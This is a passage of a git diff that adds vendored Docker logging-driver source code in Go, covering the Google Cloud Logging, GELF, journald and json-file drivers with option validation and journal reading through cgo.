+func New(ctx logger.Context) (logger.Logger, error) {
+	initGCP()
+
+	var project string
+	if projectID != "" {
+		project = projectID
+	}
+	if projectID, found := ctx.Config[projectOptKey]; found {
+		project = projectID
+	}
+	if project == "" {
+		return nil, fmt.Errorf("No project was specified and couldn't read project from the meatadata server. Please specify a project")
+	}
+
+	c, err := logging.NewClient(context.Background(), project, "gcplogs-docker-driver")
+	if err != nil {
+		return nil, err
+	}
+
+	if err := c.Ping(); err != nil {
+		return nil, fmt.Errorf("unable to connect or authenticate with Google Cloud Logging: %v", err)
+	}
+
+	l := &gcplogs{
+		client: c,
+		container: &containerInfo{
+			Name:      ctx.ContainerName,
+			ID:        ctx.ContainerID,
+			ImageName: ctx.ContainerImageName,
+			ImageID:   ctx.ContainerImageID,
+			Created:   ctx.ContainerCreated,
+			Metadata:  ctx.ExtraAttributes(nil),
+		},
+	}
+
+	if ctx.Config[logCmdKey] == "true" {
+		l.container.Command = ctx.Command()
+	}
+
+	if onGCE {
+		l.instance = &instanceInfo{
+			Zone: zone,
+			Name: instanceName,
+			ID:   instanceID,
+		}
+	} else if ctx.Config[logZoneKey] != "" || ctx.Config[logNameKey] != "" || ctx.Config[logIDKey] != "" {
+		l.instance = &instanceInfo{
+			Zone: ctx.Config[logZoneKey],
+			Name: ctx.Config[logNameKey],
+			ID:   ctx.Config[logIDKey],
+		}
+	}
+
+	// The logger "overflows" at a rate of 10,000 logs per second and this
+	// overflow func is called. We want to surface the error to the user
+	// without overly spamming /var/log/docker.log so we log the first time
+	// we overflow and every 1000th time after.
+	c.Overflow = func(_ *logging.Client, _ logging.Entry) error {
+		if i := atomic.AddUint64(&droppedLogs, 1); i%1000 == 1 {
+			logrus.Errorf("gcplogs driver has dropped %v logs", i)
+		}
+		return nil
+	}
+
+	return l, nil
+}
+
+// ValidateLogOpts validates the opts passed to the gcplogs driver. Currently, the gcplogs
+// driver doesn't take any arguments.
+func ValidateLogOpts(cfg map[string]string) error {
+	for k := range cfg {
+		switch k {
+		case projectOptKey, logLabelsKey, logEnvKey, logCmdKey, logZoneKey, logNameKey, logIDKey:
+		default:
+			return fmt.Errorf("%q is not a valid option for the gcplogs driver", k)
+		}
+	}
+	return nil
+}
+
+func (l *gcplogs) Log(m *logger.Message) error {
+	return l.client.Log(logging.Entry{
+		Time: m.Timestamp,
+		Payload: &dockerLogEntry{
+			Instance:  l.instance,
+			Container: l.container,
+			Data:      string(m.Line),
+		},
+	})
+}
+
+func (l *gcplogs) Close() error {
+	return l.client.Flush()
+}
+
+func (l *gcplogs) Name() string {
+	return name
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go
new file mode 100644
index 0000000000..95860ac083
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go
@@ -0,0 +1,209 @@
+// +build linux
+
+// Package gelf provides the log driver for forwarding server logs to
+// endpoints that support the Graylog Extended Log Format.
+package gelf
+
+import (
+	"bytes"
+	"compress/flate"
+	"encoding/json"
+	"fmt"
+	"net"
+	"net/url"
+	"strconv"
+	"time"
+
+	"github.com/Graylog2/go-gelf/gelf"
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/daemon/logger/loggerutils"
+	"github.com/docker/docker/pkg/urlutil"
+)
+
+const name = "gelf"
+
+type gelfLogger struct {
+	writer   *gelf.Writer
+	ctx      logger.Context
+	hostname string
+	rawExtra json.RawMessage
+}
+
+func init() {
+	if err := logger.RegisterLogDriver(name, New); err != nil {
+		logrus.Fatal(err)
+	}
+	if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil {
+		logrus.Fatal(err)
+	}
+}
+
+// New creates a gelf logger using the configuration passed in on the
+// context. The supported context configuration variable is gelf-address.
+func New(ctx logger.Context) (logger.Logger, error) {
+	// parse gelf address
+	address, err := parseAddress(ctx.Config["gelf-address"])
+	if err != nil {
+		return nil, err
+	}
+
+	// collect extra data for GELF message
+	hostname, err := ctx.Hostname()
+	if err != nil {
+		return nil, fmt.Errorf("gelf: cannot access hostname to set source field")
+	}
+
+	// remove trailing slash from container name
+	containerName := bytes.TrimLeft([]byte(ctx.ContainerName), "/")
+
+	// parse log tag
+	tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate)
+	if err != nil {
+		return nil, err
+	}
+
+	extra := map[string]interface{}{
+		"_container_id":   ctx.ContainerID,
+		"_container_name": string(containerName),
+		"_image_id":       ctx.ContainerImageID,
+		"_image_name":     ctx.ContainerImageName,
+		"_command":        ctx.Command(),
+		"_tag":            tag,
+		"_created":        ctx.ContainerCreated,
+	}
+
+	extraAttrs := ctx.ExtraAttributes(func(key string) string {
+		if key[0] == '_' {
+			return key
+		}
+		return "_" + key
+	})
+	for k, v := range extraAttrs {
+		extra[k] = v
+	}
+
+	rawExtra, err := json.Marshal(extra)
+	if err != nil {
+		return nil, err
+	}
+
+	// create new gelfWriter
+	gelfWriter, err := gelf.NewWriter(address)
+	if err != nil {
+		return nil, fmt.Errorf("gelf: cannot connect to GELF endpoint: %s %v", address, err)
+	}
+
+	if v, ok := ctx.Config["gelf-compression-type"]; ok {
+		switch v {
+		case "gzip":
+			gelfWriter.CompressionType = gelf.CompressGzip
+		case "zlib":
+			gelfWriter.CompressionType = gelf.CompressZlib
+		case "none":
+			gelfWriter.CompressionType = gelf.CompressNone
+		default:
+			return nil, fmt.Errorf("gelf: invalid compression type %q", v)
+		}
+	}
+
+	if v, ok := ctx.Config["gelf-compression-level"]; ok {
+		val, err := strconv.Atoi(v)
+		if err != nil {
+			return nil, fmt.Errorf("gelf: invalid compression level %s, err %v", v, err)
+		}
+		gelfWriter.CompressionLevel = val
+	}
+
+	return &gelfLogger{
+		writer:   gelfWriter,
+		ctx:      ctx,
+		hostname: hostname,
+		rawExtra: rawExtra,
+	}, nil
+}
+
+func (s *gelfLogger) Log(msg *logger.Message) error {
+	level := gelf.LOG_INFO
+	if msg.Source == "stderr" {
+		level = gelf.LOG_ERR
+	}
+
+	m := gelf.Message{
+		Version:  "1.1",
+		Host:     s.hostname,
+		Short:    string(msg.Line),
+		TimeUnix: float64(msg.Timestamp.UnixNano()/int64(time.Millisecond)) / 1000.0,
+		Level:    level,
+		RawExtra: s.rawExtra,
+	}
+
+	if err := s.writer.WriteMessage(&m); err != nil {
+		return fmt.Errorf("gelf: cannot send GELF message: %v", err)
+	}
+	return nil
+}
+
+func (s *gelfLogger) Close() error {
+	return s.writer.Close()
+}
+
+func (s *gelfLogger) Name() string {
+	return name
+}
+
+// ValidateLogOpt looks for gelf specific log option gelf-address.
+func ValidateLogOpt(cfg map[string]string) error {
+	for key, val := range cfg {
+		switch key {
+		case "gelf-address":
+		case "tag":
+		case "labels":
+		case "env":
+		case "gelf-compression-level":
+			i, err := strconv.Atoi(val)
+			if err != nil || i < flate.DefaultCompression || i > flate.BestCompression {
+				return fmt.Errorf("unknown value %q for log opt %q for gelf log driver", val, key)
+			}
+		case "gelf-compression-type":
+			switch val {
+			case "gzip", "zlib", "none":
+			default:
+				return fmt.Errorf("unknown value %q for log opt %q for gelf log driver", val, key)
+			}
+		default:
+			return fmt.Errorf("unknown log opt %q for gelf log driver", key)
+		}
+	}
+
+	if _, err := parseAddress(cfg["gelf-address"]); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func parseAddress(address string) (string, error) {
+	if address == "" {
+		return "", nil
+	}
+	if !urlutil.IsTransportURL(address) {
+		return "", fmt.Errorf("gelf-address should be in form proto://address, got %v", address)
+	}
+	url, err := url.Parse(address)
+	if err != nil {
+		return "", err
+	}
+
+	// we support only udp
+	if url.Scheme != "udp" {
+		return "", fmt.Errorf("gelf: endpoint needs to be UDP")
+	}
+
+	// get host and port
+	if _, _, err = net.SplitHostPort(url.Host); err != nil {
+		return "", fmt.Errorf("gelf: please provide gelf-address as udp://host:port")
+	}
+
+	return url.Host, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go
new file mode 100644
index 0000000000..266f73b18b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go
@@ -0,0 +1,3 @@
+// +build !linux
+
+package gelf
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald.go
new file mode 100644
index 0000000000..9569859121
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald.go
@@ -0,0 +1,122 @@
+// +build linux
+
+// Package journald provides the log driver for forwarding server logs
+// to endpoints that receive the systemd format.
+package journald
+
+import (
+	"fmt"
+	"sync"
+	"unicode"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/coreos/go-systemd/journal"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/daemon/logger/loggerutils"
+)
+
+const name = "journald"
+
+type journald struct {
+	vars    map[string]string // additional variables and values to send to the journal along with the log message
+	readers readerList
+}
+
+type readerList struct {
+	mu      sync.Mutex
+	readers map[*logger.LogWatcher]*logger.LogWatcher
+}
+
+func init() {
+	if err := logger.RegisterLogDriver(name, New); err != nil {
+		logrus.Fatal(err)
+	}
+	if err := logger.RegisterLogOptValidator(name, validateLogOpt); err != nil {
+		logrus.Fatal(err)
+	}
+}
+
+// sanitizeKeyMode returns the sanitized string so that it could be used in journald.
+// In journald log, there are special requirements for fields.
+// Fields must be composed of uppercase letters, numbers, and underscores, but must
+// not start with an underscore.
+func sanitizeKeyMod(s string) string {
+	n := ""
+	for _, v := range s {
+		if 'a' <= v && v <= 'z' {
+			v = unicode.ToUpper(v)
+		} else if ('Z' < v || v < 'A') && ('9' < v || v < '0') {
+			v = '_'
+		}
+		// If (n == "" && v == '_'), then we will skip as this is the beginning with '_'
+		if !(n == "" && v == '_') {
+			n += string(v)
+		}
+	}
+	return n
+}
+
+// New creates a journald logger using the configuration passed in on
+// the context.
+func New(ctx logger.Context) (logger.Logger, error) {
+	if !journal.Enabled() {
+		return nil, fmt.Errorf("journald is not enabled on this host")
+	}
+	// Strip a leading slash so that people can search for
+	// CONTAINER_NAME=foo rather than CONTAINER_NAME=/foo.
+	name := ctx.ContainerName
+	if name[0] == '/' {
+		name = name[1:]
+	}
+
+	// parse log tag
+	tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate)
+	if err != nil {
+		return nil, err
+	}
+
+	vars := map[string]string{
+		"CONTAINER_ID":      ctx.ContainerID[:12],
+		"CONTAINER_ID_FULL": ctx.ContainerID,
+		"CONTAINER_NAME":    name,
+		"CONTAINER_TAG":     tag,
+	}
+	extraAttrs := ctx.ExtraAttributes(sanitizeKeyMod)
+	for k, v := range extraAttrs {
+		vars[k] = v
+	}
+	return &journald{vars: vars, readers: readerList{readers: make(map[*logger.LogWatcher]*logger.LogWatcher)}}, nil
+}
+
+// We don't actually accept any options, but we have to supply a callback for
+// the factory to pass the (probably empty) configuration map to.
+func validateLogOpt(cfg map[string]string) error {
+	for key := range cfg {
+		switch key {
+		case "labels":
+		case "env":
+		case "tag":
+		default:
+			return fmt.Errorf("unknown log opt '%s' for journald log driver", key)
+		}
+	}
+	return nil
+}
+
+func (s *journald) Log(msg *logger.Message) error {
+	vars := map[string]string{}
+	for k, v := range s.vars {
+		vars[k] = v
+	}
+	if msg.Partial {
+		vars["CONTAINER_PARTIAL_MESSAGE"] = "true"
+	}
+	if msg.Source == "stderr" {
+		return journal.Send(string(msg.Line), journal.PriErr, vars)
+	}
+	return journal.Send(string(msg.Line), journal.PriInfo, vars)
+}
+
+func (s *journald) Name() string {
+	return name
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go
new file mode 100644
index 0000000000..224423fd07
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go
@@ -0,0 +1,23 @@
+// +build linux
+
+package journald
+
+import (
+	"testing"
+)
+
+func TestSanitizeKeyMod(t *testing.T) {
+	entries := map[string]string{
+		"io.kubernetes.pod.name":      "IO_KUBERNETES_POD_NAME",
+		"io?.kubernetes.pod.name":     "IO__KUBERNETES_POD_NAME",
+		"?io.kubernetes.pod.name":     "IO_KUBERNETES_POD_NAME",
+		"io123.kubernetes.pod.name":   "IO123_KUBERNETES_POD_NAME",
+		"_io123.kubernetes.pod.name":  "IO123_KUBERNETES_POD_NAME",
+		"__io123_kubernetes.pod.name": "IO123_KUBERNETES_POD_NAME",
+	}
+	for k, v := range entries {
+		if sanitizeKeyMod(k) != v {
+			t.Fatalf("Failed to sanitize %s, got %s, expected %s", k, sanitizeKeyMod(k), v)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go
new file mode 100644
index 0000000000..d52ca92e4f
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go
@@ -0,0 +1,6 @@
+// +build !linux
+
+package journald
+
+type journald struct {
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read.go b/vendor/github.com/docker/docker/daemon/logger/journald/read.go
new file mode 100644
index 0000000000..d91eb809bc
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/read.go
@@ -0,0 +1,401 @@
+// +build linux,cgo,!static_build,journald
+
+package journald
+
+// #include <sys/types.h>
+// #include <sys/poll.h>
+// #include <systemd/sd-journal.h>
+// #include <errno.h>
+// #include <stdio.h>
+// #include <stdlib.h>
+// #include <string.h>
+// #include <time.h>
+// #include <unistd.h>
+//
+//static int get_message(sd_journal *j, const char **msg, size_t *length, int *partial)
+//{
+//	int rc;
+//	size_t plength;
+//	*msg = NULL;
+//	*length = 0;
+//	plength = strlen("CONTAINER_PARTIAL_MESSAGE=true");
+//	rc = sd_journal_get_data(j, "CONTAINER_PARTIAL_MESSAGE", (const void **) msg, length);
+//	*partial = ((rc == 0) && (*length == plength) && (memcmp(*msg, "CONTAINER_PARTIAL_MESSAGE=true", plength) == 0));
+//	rc = sd_journal_get_data(j, "MESSAGE", (const void **) msg, length);
+//	if (rc == 0) {
+//		if (*length > 8) {
+//			(*msg) += 8;
+//			*length -= 8;
+//		} else {
+//			*msg = NULL;
+//			*length = 0;
+//			rc = -ENOENT;
+//		}
+//	}
+//	return rc;
+//}
+//static int get_priority(sd_journal *j, int *priority)
+//{
+//	const void *data;
+//	size_t i, length;
+//	int rc;
+//	*priority = -1;
+//	rc = sd_journal_get_data(j, "PRIORITY", &data, &length);
+//	if (rc == 0) {
+//		if ((length > 9) && (strncmp(data, "PRIORITY=", 9) == 0)) {
+//			*priority = 0;
+//			for (i = 9; i < length; i++) {
+//				*priority = *priority * 10 + ((const char *)data)[i] - '0';
+//			}
+//			if (length > 9) {
+//				rc = 0;
+//			}
+//		}
+//	}
+//	return rc;
+//}
+//static int is_attribute_field(const char *msg, size_t length)
+//{
+//	static const struct known_field {
+//		const char *name;
+//		size_t length;
+//	} fields[] = {
+//		{"MESSAGE", sizeof("MESSAGE") - 1},
+//		{"MESSAGE_ID", sizeof("MESSAGE_ID") - 1},
+//		{"PRIORITY", sizeof("PRIORITY") - 1},
+//		{"CODE_FILE", sizeof("CODE_FILE") - 1},
+//		{"CODE_LINE", sizeof("CODE_LINE") - 1},
+//		{"CODE_FUNC", sizeof("CODE_FUNC") - 1},
+//		{"ERRNO", sizeof("ERRNO") - 1},
+//		{"SYSLOG_FACILITY", sizeof("SYSLOG_FACILITY") - 1},
+//		{"SYSLOG_IDENTIFIER", sizeof("SYSLOG_IDENTIFIER") - 1},
+//		{"SYSLOG_PID", sizeof("SYSLOG_PID") - 1},
+//		{"CONTAINER_NAME", sizeof("CONTAINER_NAME") - 1},
+//		{"CONTAINER_ID", sizeof("CONTAINER_ID") - 1},
+//		{"CONTAINER_ID_FULL", sizeof("CONTAINER_ID_FULL") - 1},
+//		{"CONTAINER_TAG", sizeof("CONTAINER_TAG") - 1},
+//	};
+//	unsigned int i;
+//	void *p;
+//	if ((length < 1) || (msg[0] == '_') || ((p = memchr(msg, '=', length)) == NULL)) {
+//		return -1;
+//	}
+//	length = ((const char *) p) - msg;
+//	for (i = 0; i < sizeof(fields) / sizeof(fields[0]); i++) {
+//		if ((fields[i].length == length) && (memcmp(fields[i].name, msg, length) == 0)) {
+//			return -1;
+//		}
+//	}
+//	return 0;
+//}
+//static int get_attribute_field(sd_journal *j, const char **msg, size_t *length)
+//{
+//	int rc;
+//	*msg = NULL;
+//	*length = 0;
+//	while ((rc = sd_journal_enumerate_data(j, (const void **) msg, length)) > 0) {
+//		if (is_attribute_field(*msg, *length) == 0) {
+//			break;
+//		}
+//		rc = -ENOENT;
+//	}
+//	return rc;
+//}
+//static int wait_for_data_cancelable(sd_journal *j, int pipefd)
+//{
+//	struct pollfd fds[2];
+//	uint64_t when = 0;
+//	int timeout, jevents, i;
+//	struct timespec ts;
+//	uint64_t now;
+//
+//	memset(&fds, 0, sizeof(fds));
+//	fds[0].fd = pipefd;
+//	fds[0].events = POLLHUP;
+//	fds[1].fd = sd_journal_get_fd(j);
+//	if (fds[1].fd < 0) {
+//		return fds[1].fd;
+//	}
+//
+//	do {
+//		jevents = sd_journal_get_events(j);
+//		if (jevents < 0) {
+//			return jevents;
+//		}
+//		fds[1].events = jevents;
+//		sd_journal_get_timeout(j, &when);
+//		if (when == -1) {
+//			timeout = -1;
+//		} else {
+//			clock_gettime(CLOCK_MONOTONIC, &ts);
+//			now = (uint64_t) ts.tv_sec * 1000000 + ts.tv_nsec / 1000;
+//			timeout = when > now ? (int) ((when - now + 999) / 1000) : 0;
+//		}
+//		i = poll(fds, 2, timeout);
+//		if ((i == -1) && (errno != EINTR)) {
+//			/* An unexpected error. */
+//			return (errno != 0) ? -errno : -EINTR;
+//		}
+//		if (fds[0].revents & POLLHUP) {
+//			/* The close notification pipe was closed. */
+//			return 0;
+//		}
+//		if (sd_journal_process(j) == SD_JOURNAL_APPEND) {
+//			/* Data, which we might care about, was appended. */
+//			return 1;
+//		}
+//	} while ((fds[0].revents & POLLHUP) == 0);
+//	return 0;
+//}
+import "C"
+
+import (
+	"fmt"
+	"strings"
+	"time"
+	"unsafe"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/coreos/go-systemd/journal"
+	"github.com/docker/docker/daemon/logger"
+)
+
+func (s *journald) Close() error {
+	s.readers.mu.Lock()
+	for reader := range s.readers.readers {
+		reader.Close()
+	}
+	s.readers.mu.Unlock()
+	return nil
+}
+
+func (s *journald) drainJournal(logWatcher *logger.LogWatcher, config logger.ReadConfig, j *C.sd_journal, oldCursor *C.char) *C.char {
+	var msg, data, cursor *C.char
+	var length C.size_t
+	var stamp C.uint64_t
+	var priority, partial C.int
+
+	// Walk the journal from here forward until we run out of new entries.
+drain:
+	for {
+		// Try not to send a given entry twice.
+		if oldCursor != nil {
+			for C.sd_journal_test_cursor(j, oldCursor) > 0 {
+				if C.sd_journal_next(j) <= 0 {
+					break drain
+				}
+			}
+		}
+		// Read and send the logged message, if there is one to read.
+		i := C.get_message(j, &msg, &length, &partial)
+		if i != -C.ENOENT && i != -C.EADDRNOTAVAIL {
+			// Read the entry's timestamp.
+			if C.sd_journal_get_realtime_usec(j, &stamp) != 0 {
+				break
+			}
+			// Set up the time and text of the entry.
+			timestamp := time.Unix(int64(stamp)/1000000, (int64(stamp)%1000000)*1000)
+			line := C.GoBytes(unsafe.Pointer(msg), C.int(length))
+			if partial == 0 {
+				line = append(line, "\n"...)
+			}
+			// Recover the stream name by mapping
+			// from the journal priority back to
+			// the stream that we would have
+			// assigned that value.
+			source := ""
+			if C.get_priority(j, &priority) != 0 {
+				source = ""
+			} else if priority == C.int(journal.PriErr) {
+				source = "stderr"
+			} else if priority == C.int(journal.PriInfo) {
+				source = "stdout"
+			}
+			// Retrieve the values of any variables we're adding to the journal.
+			attrs := make(map[string]string)
+			C.sd_journal_restart_data(j)
+			for C.get_attribute_field(j, &data, &length) > C.int(0) {
+				kv := strings.SplitN(C.GoStringN(data, C.int(length)), "=", 2)
+				attrs[kv[0]] = kv[1]
+			}
+			if len(attrs) == 0 {
+				attrs = nil
+			}
+			// Send the log message.
+			logWatcher.Msg <- &logger.Message{
+				Line:      line,
+				Source:    source,
+				Timestamp: timestamp.In(time.UTC),
+				Attrs:     attrs,
+			}
+		}
+		// If we're at the end of the journal, we're done (for now).
+		if C.sd_journal_next(j) <= 0 {
+			break
+		}
+	}
+
+	// free(NULL) is safe
+	C.free(unsafe.Pointer(oldCursor))
+	C.sd_journal_get_cursor(j, &cursor)
+	return cursor
+}
+
+func (s *journald) followJournal(logWatcher *logger.LogWatcher, config logger.ReadConfig, j *C.sd_journal, pfd [2]C.int, cursor *C.char) *C.char {
+	s.readers.mu.Lock()
+	s.readers.readers[logWatcher] = logWatcher
+	s.readers.mu.Unlock()
+	go func() {
+		// Keep copying journal data out until we're notified to stop
+		// or we hit an error.
+		status := C.wait_for_data_cancelable(j, pfd[0])
+		for status == 1 {
+			cursor = s.drainJournal(logWatcher, config, j, cursor)
+			status = C.wait_for_data_cancelable(j, pfd[0])
+		}
+		if status < 0 {
+			cerrstr := C.strerror(C.int(-status))
+			errstr := C.GoString(cerrstr)
+			fmtstr := "error %q while attempting to follow journal for container %q"
+			logrus.Errorf(fmtstr, errstr, s.vars["CONTAINER_ID_FULL"])
+		}
+		// Clean up.
+		C.close(pfd[0])
+		s.readers.mu.Lock()
+		delete(s.readers.readers, logWatcher)
+		s.readers.mu.Unlock()
+		C.sd_journal_close(j)
+		close(logWatcher.Msg)
+	}()
+	// Wait until we're told to stop.
+	select {
+	case <-logWatcher.WatchClose():
+		// Notify the other goroutine that its work is done.
+		C.close(pfd[1])
+	}
+
+	return cursor
+}
+
+func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadConfig) {
+	var j *C.sd_journal
+	var cmatch, cursor *C.char
+	var stamp C.uint64_t
+	var sinceUnixMicro uint64
+	var pipes [2]C.int
+
+	// Get a handle to the journal.
+	rc := C.sd_journal_open(&j, C.int(0))
+	if rc != 0 {
+		logWatcher.Err <- fmt.Errorf("error opening journal")
+		close(logWatcher.Msg)
+		return
+	}
+	// If we end up following the log, we can set the journal context
+	// pointer and the channel pointer to nil so that we won't close them
+	// here, potentially while the goroutine that uses them is still
+	// running.  Otherwise, close them when we return from this function.
+	following := false
+	defer func(pfollowing *bool) {
+		if !*pfollowing {
+			C.sd_journal_close(j)
+			close(logWatcher.Msg)
+		}
+	}(&following)
+	// Remove limits on the size of data items that we'll retrieve.
+	rc = C.sd_journal_set_data_threshold(j, C.size_t(0))
+	if rc != 0 {
+		logWatcher.Err <- fmt.Errorf("error setting journal data threshold")
+		return
+	}
+	// Add a match to have the library do the searching for us.
+	cmatch = C.CString("CONTAINER_ID_FULL=" + s.vars["CONTAINER_ID_FULL"])
+	defer C.free(unsafe.Pointer(cmatch))
+	rc = C.sd_journal_add_match(j, unsafe.Pointer(cmatch), C.strlen(cmatch))
+	if rc != 0 {
+		logWatcher.Err <- fmt.Errorf("error setting journal match")
+		return
+	}
+	// If we have a cutoff time, convert it to Unix time once.
+	if !config.Since.IsZero() {
+		nano := config.Since.UnixNano()
+		sinceUnixMicro = uint64(nano / 1000)
+	}
+	if config.Tail > 0 {
+		lines := config.Tail
+		// Start at the end of the journal.
+		if C.sd_journal_seek_tail(j) < 0 {
+			logWatcher.Err <- fmt.Errorf("error seeking to end of journal")
+			return
+		}
+		if C.sd_journal_previous(j) < 0 {
+			logWatcher.Err <- fmt.Errorf("error backtracking to previous journal entry")
+			return
+		}
+		// Walk backward.
+		for lines > 0 {
+			// Stop if the entry time is before our cutoff.
+			// We'll need the entry time if it isn't, so go
+			// ahead and parse it now.
+			if C.sd_journal_get_realtime_usec(j, &stamp) != 0 {
+				break
+			} else {
+				// Compare the timestamp on the entry
+				// to our threshold value.
+				if sinceUnixMicro != 0 && sinceUnixMicro > uint64(stamp) {
+					break
+				}
+			}
+			lines--
+			// If we're at the start of the journal, or
+			// don't need to back up past any more entries,
+			// stop.
+			if lines == 0 || C.sd_journal_previous(j) <= 0 {
+				break
+			}
+		}
+	} else {
+		// Start at the beginning of the journal.
+		if C.sd_journal_seek_head(j) < 0 {
+			logWatcher.Err <- fmt.Errorf("error seeking to start of journal")
+			return
+		}
+		// If we have a cutoff date, fast-forward to it.
+		if sinceUnixMicro != 0 && C.sd_journal_seek_realtime_usec(j, C.uint64_t(sinceUnixMicro)) != 0 {
+			logWatcher.Err <- fmt.Errorf("error seeking to start time in journal")
+			return
+		}
+		if C.sd_journal_next(j) < 0 {
+			logWatcher.Err <- fmt.Errorf("error skipping to next journal entry")
+			return
+		}
+	}
+	cursor = s.drainJournal(logWatcher, config, j, nil)
+	if config.Follow {
+		// Allocate a descriptor for following the journal, if we'll
+		// need one.  Do it here so that we can report if it fails.
+		if fd := C.sd_journal_get_fd(j); fd < C.int(0) {
+			logWatcher.Err <- fmt.Errorf("error opening journald follow descriptor: %q", C.GoString(C.strerror(-fd)))
+		} else {
+			// Create a pipe that we can poll at the same time as
+			// the journald descriptor.
+			if C.pipe(&pipes[0]) == C.int(-1) {
+				logWatcher.Err <- fmt.Errorf("error opening journald close notification pipe")
+			} else {
+				cursor = s.followJournal(logWatcher, config, j, pipes, cursor)
+				// Let followJournal handle freeing the journal context
+				// object and closing the channel.
+				following = true
+			}
+		}
+	}
+
+	C.free(unsafe.Pointer(cursor))
+	return
+}
+
+func (s *journald) ReadLogs(config logger.ReadConfig) *logger.LogWatcher {
+	logWatcher := logger.NewLogWatcher()
+	go s.readLogs(logWatcher, config)
+	return logWatcher
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go
new file mode 100644
index 0000000000..bba6de55be
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go
@@ -0,0 +1,6 @@
+// +build linux,cgo,!static_build,journald,!journald_compat
+
+package journald
+
+// #cgo pkg-config: libsystemd
+import "C"
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go
new file mode 100644
index 0000000000..3f7a43c59e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go
@@ -0,0 +1,6 @@
+// +build linux,cgo,!static_build,journald,journald_compat
+
+package journald
+
+// #cgo pkg-config: libsystemd-journal
+import "C"
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go
new file mode 100644
index 0000000000..b43abdcaf7
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go
@@ -0,0 +1,7 @@
+// +build !linux !cgo static_build !journald
+
+package journald
+
+func (s *journald) Close() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go
new file mode 100644
index 0000000000..a429a08a4f
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go
@@ -0,0 +1,151 @@
+// Package jsonfilelog provides the default Logger implementation for
+// Docker logging. This logger logs to files on the host server in the
+// JSON format.
+package jsonfilelog
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"strconv"
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/daemon/logger/loggerutils"
+	"github.com/docker/docker/pkg/jsonlog"
+	"github.com/docker/go-units"
+)
+
+// Name is the name of the file that the jsonlogger logs to.
+const Name = "json-file"
+
+// JSONFileLogger is Logger implementation for default Docker logging.
+type JSONFileLogger struct {
+	buf     *bytes.Buffer
+	writer  *loggerutils.RotateFileWriter
+	mu      sync.Mutex
+	readers map[*logger.LogWatcher]struct{} // stores the active log followers
+	extra   []byte                          // json-encoded extra attributes
+}
+
+func init() {
+	if err := logger.RegisterLogDriver(Name, New); err != nil {
+		logrus.Fatal(err)
+	}
+	if err := logger.RegisterLogOptValidator(Name, ValidateLogOpt); err != nil {
+		logrus.Fatal(err)
+	}
+}
+
+// New creates new JSONFileLogger which writes to filename passed in
+// on given context.
+func New(ctx logger.Context) (logger.Logger, error) {
+	var capval int64 = -1
+	if capacity, ok := ctx.Config["max-size"]; ok {
+		var err error
+		capval, err = units.FromHumanSize(capacity)
+		if err != nil {
+			return nil, err
+		}
+	}
+	var maxFiles = 1
+	if maxFileString, ok := ctx.Config["max-file"]; ok {
+		var err error
+		maxFiles, err = strconv.Atoi(maxFileString)
+		if err != nil {
+			return nil, err
+		}
+		if maxFiles < 1 {
+			return nil, fmt.Errorf("max-file cannot be less than 1")
+		}
+	}
+
+	writer, err := loggerutils.NewRotateFileWriter(ctx.LogPath, capval, maxFiles)
+	if err != nil {
+		return nil, err
+	}
+
+	var extra []byte
+	if attrs := ctx.ExtraAttributes(nil); len(attrs) > 0 {
+		var err error
+		extra, err = json.Marshal(attrs)
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	return &JSONFileLogger{
+		buf:     bytes.NewBuffer(nil),
+		writer:  writer,
+		readers: make(map[*logger.LogWatcher]struct{}),
+		extra:   extra,
+	}, nil
+}
+
+// Log converts logger.Message to jsonlog.JSONLog and serializes it to file.
+func (l *JSONFileLogger) Log(msg *logger.Message) error {
